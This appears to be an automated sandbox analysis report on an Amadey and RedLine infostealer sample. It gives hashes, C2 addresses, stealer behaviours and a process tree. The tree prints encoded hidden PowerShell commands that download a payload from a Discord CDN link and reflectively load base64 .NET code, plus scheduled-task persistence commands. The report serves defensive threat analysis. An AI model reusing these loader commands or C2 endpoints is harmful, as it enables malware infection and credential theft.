amadey | 880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6

Analysis

max time kernel
141s
max time network
166s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
05-12-2022 15:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe
Size

332KB
MD5

31d0310cd3d6d5e2e7c51508c12b25dd
SHA1

c19664c55ede5d5411d348fae4832823b7085086
SHA256

880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6
SHA512

2015f457aa5daa7ce8460c954243184ec77187f1ad1d997167074f84a3d31b32bf55be08b0d6043f20ddee289e93809150cc0b966e277fa7d66fdb92d10b1c9c
SSDEEP

6144:2nthmabx7r/ALqcu8pPP0uJLnJ0Lf02sge2U:2ntYabx7kZdP0uJLnJWfPmd

Score

10^/10

amadey redline wish collection infostealer persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1015613582383259758/1018992777566097538/error.log.1

Extracted

Family

amadey

Version

3.50

62.204.41.6/p9cWxH/index.php

Extracted

Family

redline

Botnet

Wish

31.41.244.14:4694

Attributes

auth_value
836b5b05c28f01127949ef1e84b93e92

Extracted

Family

amadey

Version

3.10

hellomr.observer/f8dfksdj3/index.php

researchersgokick.rocks/f8dfksdj3/index.php

pleasetake.pictures/f8dfksdj3/index.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect Amadey credential stealer module 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll	amadey_cred_module
behavioral1/memory/3724-154-0x0000000000A90000-0x0000000000AB4000-memory.dmp	amadey_cred_module
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll	amadey_cred_module
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll	amadey_cred_module

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Blocklisted process makes network request 3 IoCs

Processes:

rundll32.exepowershell.exepowershell.exe

flow pid process

41 3724 rundll32.exe
66 4356 powershell.exe
74 732 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 9 IoCs

Processes:

gntuud.exegntuud.exelinda5.exewish.exebuild333333.exeUSBtoISOConverter.exegntuud.exeUpdate.exeorxds.exe

pid process

1220 gntuud.exe
228 gntuud.exe
3680 linda5.exe
1244 wish.exe
3684 build333333.exe
4548 USBtoISOConverter.exe
752 gntuud.exe
2192 Update.exe
2600 orxds.exe

flow	pid	process
41	3724	rundll32.exe
66	4356	powershell.exe
74	732	powershell.exe

pid	process
1220	gntuud.exe
228	gntuud.exe
3680	linda5.exe
1244	wish.exe
3684	build333333.exe
4548	USBtoISOConverter.exe
752	gntuud.exe
2192	Update.exe
2600	orxds.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exegntuud.exelinda5.exeUpdate.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	gntuud.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	linda5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	Update.exe

Loads dropped DLL 5 IoCs

Processes:

rundll32.exerundll32.exerundll32.exe

pid process

3724 rundll32.exe
3724 rundll32.exe
2908 rundll32.exe
792 rundll32.exe
792 rundll32.exe
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

rundll32.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	rundll32.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

gntuud.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\build333333.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000013001\\build333333.exe"	gntuud.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\USBtoISOConverter.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000019001\\USBtoISOConverter.exe"	gntuud.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\linda5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000011001\\linda5.exe"	gntuud.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3564	4808	WerFault.exe	880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe
3468	228	WerFault.exe	gntuud.exe
3892	752	WerFault.exe	gntuud.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

2616 schtasks.exe
3852 schtasks.exe
Modifies registry class 1 IoCs

Processes:

linda5.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings linda5.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3816 PING.EXE

pid	process
2616	schtasks.exe
3852	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	linda5.exe

pid	process
3816	PING.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

rundll32.exewish.exepowershell.exepowershell.exepowershell.exe

pid	process
3724	rundll32.exe
3724	rundll32.exe
3724	rundll32.exe
3724	rundll32.exe
1244	wish.exe
4356	powershell.exe
4356	powershell.exe
1244	wish.exe
732	powershell.exe
732	powershell.exe
1268	powershell.exe
1268	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

wmic.exeWMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	3368	wmic.exe
Token: SeSecurityPrivilege	3368	wmic.exe
Token: SeTakeOwnershipPrivilege	3368	wmic.exe
Token: SeLoadDriverPrivilege	3368	wmic.exe
Token: SeSystemProfilePrivilege	3368	wmic.exe
Token: SeSystemtimePrivilege	3368	wmic.exe
Token: SeProfSingleProcessPrivilege	3368	wmic.exe
Token: SeIncBasePriorityPrivilege	3368	wmic.exe
Token: SeCreatePagefilePrivilege	3368	wmic.exe
Token: SeBackupPrivilege	3368	wmic.exe
Token: SeRestorePrivilege	3368	wmic.exe
Token: SeShutdownPrivilege	3368	wmic.exe
Token: SeDebugPrivilege	3368	wmic.exe
Token: SeSystemEnvironmentPrivilege	3368	wmic.exe
Token: SeRemoteShutdownPrivilege	3368	wmic.exe
Token: SeUndockPrivilege	3368	wmic.exe
Token: SeManageVolumePrivilege	3368	wmic.exe
Token: 33	3368	wmic.exe
Token: 34	3368	wmic.exe
Token: 35	3368	wmic.exe
Token: 36	3368	wmic.exe
Token: SeIncreaseQuotaPrivilege	3368	wmic.exe
Token: SeSecurityPrivilege	3368	wmic.exe
Token: SeTakeOwnershipPrivilege	3368	wmic.exe
Token: SeLoadDriverPrivilege	3368	wmic.exe
Token: SeSystemProfilePrivilege	3368	wmic.exe
Token: SeSystemtimePrivilege	3368	wmic.exe
Token: SeProfSingleProcessPrivilege	3368	wmic.exe
Token: SeIncBasePriorityPrivilege	3368	wmic.exe
Token: SeCreatePagefilePrivilege	3368	wmic.exe
Token: SeBackupPrivilege	3368	wmic.exe
Token: SeRestorePrivilege	3368	wmic.exe
Token: SeShutdownPrivilege	3368	wmic.exe
Token: SeDebugPrivilege	3368	wmic.exe
Token: SeSystemEnvironmentPrivilege	3368	wmic.exe
Token: SeRemoteShutdownPrivilege	3368	wmic.exe
Token: SeUndockPrivilege	3368	wmic.exe
Token: SeManageVolumePrivilege	3368	wmic.exe
Token: 33	3368	wmic.exe
Token: 34	3368	wmic.exe
Token: 35	3368	wmic.exe
Token: 36	3368	wmic.exe
Token: SeIncreaseQuotaPrivilege	4576	WMIC.exe
Token: SeSecurityPrivilege	4576	WMIC.exe
Token: SeTakeOwnershipPrivilege	4576	WMIC.exe
Token: SeLoadDriverPrivilege	4576	WMIC.exe
Token: SeSystemProfilePrivilege	4576	WMIC.exe
Token: SeSystemtimePrivilege	4576	WMIC.exe
Token: SeProfSingleProcessPrivilege	4576	WMIC.exe
Token: SeIncBasePriorityPrivilege	4576	WMIC.exe
Token: SeCreatePagefilePrivilege	4576	WMIC.exe
Token: SeBackupPrivilege	4576	WMIC.exe
Token: SeRestorePrivilege	4576	WMIC.exe
Token: SeShutdownPrivilege	4576	WMIC.exe
Token: SeDebugPrivilege	4576	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4576	WMIC.exe
Token: SeRemoteShutdownPrivilege	4576	WMIC.exe
Token: SeUndockPrivilege	4576	WMIC.exe
Token: SeManageVolumePrivilege	4576	WMIC.exe
Token: 33	4576	WMIC.exe
Token: 34	4576	WMIC.exe
Token: 35	4576	WMIC.exe
Token: 36	4576	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4576	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exegntuud.exelinda5.execontrol.exebuild333333.execmd.execmd.exerundll32.exeRunDll32.exeUSBtoISOConverter.execmd.exepowershell.execmd.execmd.exepowershell.exe

description	pid	process	target process
PID 4808 wrote to memory of 1220	4808	880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe	gntuud.exe
PID 4808 wrote to memory of 1220	4808	880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe	gntuud.exe
PID 4808 wrote to memory of 1220	4808	880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe	gntuud.exe
PID 1220 wrote to memory of 2616	1220	gntuud.exe	schtasks.exe
PID 1220 wrote to memory of 2616	1220	gntuud.exe	schtasks.exe
PID 1220 wrote to memory of 2616	1220	gntuud.exe	schtasks.exe
PID 1220 wrote to memory of 3680	1220	gntuud.exe	linda5.exe
PID 1220 wrote to memory of 3680	1220	gntuud.exe	linda5.exe
PID 1220 wrote to memory of 3680	1220	gntuud.exe	linda5.exe
PID 3680 wrote to memory of 3700	3680	linda5.exe	control.exe
PID 3680 wrote to memory of 3700	3680	linda5.exe	control.exe
PID 3680 wrote to memory of 3700	3680	linda5.exe	control.exe
PID 1220 wrote to memory of 3724	1220	gntuud.exe	rundll32.exe
PID 1220 wrote to memory of 3724	1220	gntuud.exe	rundll32.exe
PID 1220 wrote to memory of 3724	1220	gntuud.exe	rundll32.exe
PID 1220 wrote to memory of 1244	1220	gntuud.exe	wish.exe
PID 1220 wrote to memory of 1244	1220	gntuud.exe	wish.exe
PID 1220 wrote to memory of 1244	1220	gntuud.exe	wish.exe
PID 3700 wrote to memory of 2908	3700	control.exe	rundll32.exe
PID 3700 wrote to memory of 2908	3700	control.exe	rundll32.exe
PID 3700 wrote to memory of 2908	3700	control.exe	rundll32.exe
PID 1220 wrote to memory of 3684	1220	gntuud.exe	build333333.exe
PID 1220 wrote to memory of 3684	1220	gntuud.exe	build333333.exe
PID 1220 wrote to memory of 3684	1220	gntuud.exe	build333333.exe
PID 3684 wrote to memory of 3368	3684	build333333.exe	wmic.exe
PID 3684 wrote to memory of 3368	3684	build333333.exe	wmic.exe
PID 3684 wrote to memory of 3368	3684	build333333.exe	wmic.exe
PID 3684 wrote to memory of 1272	3684	build333333.exe	cmd.exe
PID 3684 wrote to memory of 1272	3684	build333333.exe	cmd.exe
PID 3684 wrote to memory of 1272	3684	build333333.exe	cmd.exe
PID 1272 wrote to memory of 4576	1272	cmd.exe	WMIC.exe
PID 1272 wrote to memory of 4576	1272	cmd.exe	WMIC.exe
PID 1272 wrote to memory of 4576	1272	cmd.exe	WMIC.exe
PID 1220 wrote to memory of 4548	1220	gntuud.exe	USBtoISOConverter.exe
PID 1220 wrote to memory of 4548	1220	gntuud.exe	USBtoISOConverter.exe
PID 3684 wrote to memory of 4388	3684	build333333.exe	cmd.exe
PID 3684 wrote to memory of 4388	3684	build333333.exe	cmd.exe
PID 3684 wrote to memory of 4388	3684	build333333.exe	cmd.exe
PID 4388 wrote to memory of 1508	4388	cmd.exe	WMIC.exe
PID 4388 wrote to memory of 1508	4388	cmd.exe	WMIC.exe
PID 4388 wrote to memory of 1508	4388	cmd.exe	WMIC.exe
PID 2908 wrote to memory of 5048	2908	rundll32.exe	RunDll32.exe
PID 2908 wrote to memory of 5048	2908	rundll32.exe	RunDll32.exe
PID 5048 wrote to memory of 792	5048	RunDll32.exe	rundll32.exe
PID 5048 wrote to memory of 792	5048	RunDll32.exe	rundll32.exe
PID 5048 wrote to memory of 792	5048	RunDll32.exe	rundll32.exe
PID 4548 wrote to memory of 4200	4548	USBtoISOConverter.exe	cmd.exe
PID 4548 wrote to memory of 4200	4548	USBtoISOConverter.exe	cmd.exe
PID 4200 wrote to memory of 4356	4200	cmd.exe	powershell.exe
PID 4200 wrote to memory of 4356	4200	cmd.exe	powershell.exe
PID 4356 wrote to memory of 3852	4356	powershell.exe	schtasks.exe
PID 4356 wrote to memory of 3852	4356	powershell.exe	schtasks.exe
PID 4548 wrote to memory of 5040	4548	USBtoISOConverter.exe	cmd.exe
PID 4548 wrote to memory of 5040	4548	USBtoISOConverter.exe	cmd.exe
PID 5040 wrote to memory of 732	5040	cmd.exe	powershell.exe
PID 5040 wrote to memory of 732	5040	cmd.exe	powershell.exe
PID 4548 wrote to memory of 2032	4548	USBtoISOConverter.exe	cmd.exe
PID 4548 wrote to memory of 2032	4548	USBtoISOConverter.exe	cmd.exe
PID 2032 wrote to memory of 1268	2032	cmd.exe	powershell.exe
PID 2032 wrote to memory of 1268	2032	cmd.exe	powershell.exe
PID 1268 wrote to memory of 2192	1268	powershell.exe	Update.exe
PID 1268 wrote to memory of 2192	1268	powershell.exe	Update.exe
PID 1268 wrote to memory of 2192	1268	powershell.exe	Update.exe
PID 4548 wrote to memory of 2044	4548	USBtoISOConverter.exe	cmd.exe

outlook_win_path 1 IoCs

Processes:

rundll32.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	rundll32.exe

C:\Users\Admin\AppData\Local\Temp\880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe
"C:\Users\Admin\AppData\Local\Temp\880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4808

C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe
"C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1220

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe" /F
3⤵
- Creates scheduled task(s)
PID:2616

C:\Users\Admin\AppData\Local\Temp\1000011001\linda5.exe
"C:\Users\Admin\AppData\Local\Temp\1000011001\linda5.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3680

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\uQwK5O.CPL",
4⤵
- Suspicious use of WriteProcessMemory
PID:3700

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\uQwK5O.CPL",
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2908

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\uQwK5O.CPL",
6⤵
- Suspicious use of WriteProcessMemory
PID:5048

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\uQwK5O.CPL",
7⤵
- Loads dropped DLL
PID:792

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- outlook_win_path
PID:3724

C:\Users\Admin\AppData\Local\Temp\1000012001\wish.exe
"C:\Users\Admin\AppData\Local\Temp\1000012001\wish.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1244

C:\Users\Admin\AppData\Local\Temp\1000013001\build333333.exe
"C:\Users\Admin\AppData\Local\Temp\1000013001\build333333.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3684

C:\Windows\SysWOW64\Wbem\wmic.exe
wmic os get Caption
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3368

C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic path win32_VideoController get name"
4⤵
- Suspicious use of WriteProcessMemory
PID:1272

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4576

C:\Windows\SysWOW64\cmd.exe
cmd /C "wmic cpu get name"
4⤵
- Suspicious use of WriteProcessMemory
PID:4388

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic cpu get name
5⤵
PID:1508

C:\Users\Admin\AppData\Local\Temp\1000019001\USBtoISOConverter.exe
"C:\Users\Admin\AppData\Local\Temp\1000019001\USBtoISOConverter.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -v 4 -WindowStyle hidden -executionpolicy bypass -encoded JABkACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAMgAxAHMAZwA0AC4AbABvAGcAJwA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADEANQA2ADEAMwA1ADgAMgAzADgAMwAyADUAOQA3ADUAOAAvADEAMAAxADgAOQA5ADIANQA1ADYAMAA4ADUAOAA3ADAANQA5ADIALwBjAGMAYwAnACAALQBPAHUAdABmAGkAbABlACAAJABkADsAJABkAGEAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABkADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZABhACkAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwBbAEMALgBDAGwAYQBzAHMAMQBdADoAOgBSAHUAbgAoACkAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBFAHgAdABlAG4AcwBpAG8AbgAgACIAZQB4AGUAIgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAIgAsACIAJABlAG4AdgA6AFQARQBNAFAAIgAsACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACIAOwBzAGMAaAB0AGEAcwBrAHMAIAAvAGMAcgBlAGEAdABlACAALwBzAGMAIABPAE4ATABPAEcATwBOACAALwBGACAALwB0AG4AIAAiAFcAaQBuAGQAbwB3AHMAIABTAGMAaABlAGQAdQBsAGUAZAAgAFUAcABkAGEAdABlACIAIAAvAHIAbAAgAEgASQBHAEgARQBTAFQAIAAvAHQAcgAgACIAQwA6AFwAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABVAHAAZABhAHQAZQAuAGUAeABlACIA
4⤵
- Suspicious use of WriteProcessMemory
PID:4200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -v 4 -WindowStyle hidden -executionpolicy bypass -encoded JABkACAAPQAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAMgAxAHMAZwA0AC4AbABvAGcAJwA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADEANQA2ADEAMwA1ADgAMgAzADgAMwAyADUAOQA3ADUAOAAvADEAMAAxADgAOQA5ADIANQA1ADYAMAA4ADUAOAA3ADAANQA5ADIALwBjAGMAYwAnACAALQBPAHUAdABmAGkAbABlACAAJABkADsAJABkAGEAIAA9ACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAJABkADsAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZABhACkAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwAOwBbAEMALgBDAGwAYQBzAHMAMQBdADoAOgBSAHUAbgAoACkAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBFAHgAdABlAG4AcwBpAG8AbgAgACIAZQB4AGUAIgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAIgAsACIAJABlAG4AdgA6AFQARQBNAFAAIgAsACIAJABlAG4AdgA6AEwATwBDAEEATABBAFAAUABEAEEAVABBACIAOwBzAGMAaAB0AGEAcwBrAHMAIAAvAGMAcgBlAGEAdABlACAALwBzAGMAIABPAE4ATABPAEcATwBOACAALwBGACAALwB0AG4AIAAiAFcAaQBuAGQAbwB3AHMAIABTAGMAaABlAGQAdQBsAGUAZAAgAFUAcABkAGEAdABlACIAIAAvAHIAbAAgAEgASQBHAEgARQBTAFQAIAAvAHQAcgAgACIAQwA6AFwAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABVAHAAZABhAHQAZQAuAGUAeABlACIA
5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4356

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /F /tn "Windows Scheduled Update" /rl HIGHEST /tr C:\\ProgramData\Update.exe
6⤵
- Creates scheduled task(s)
PID:3852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -v 4 -WindowStyle hidden -executionpolicy bypass -co "[Reflection.Assembly]::Load([Convert]::FromBase64String('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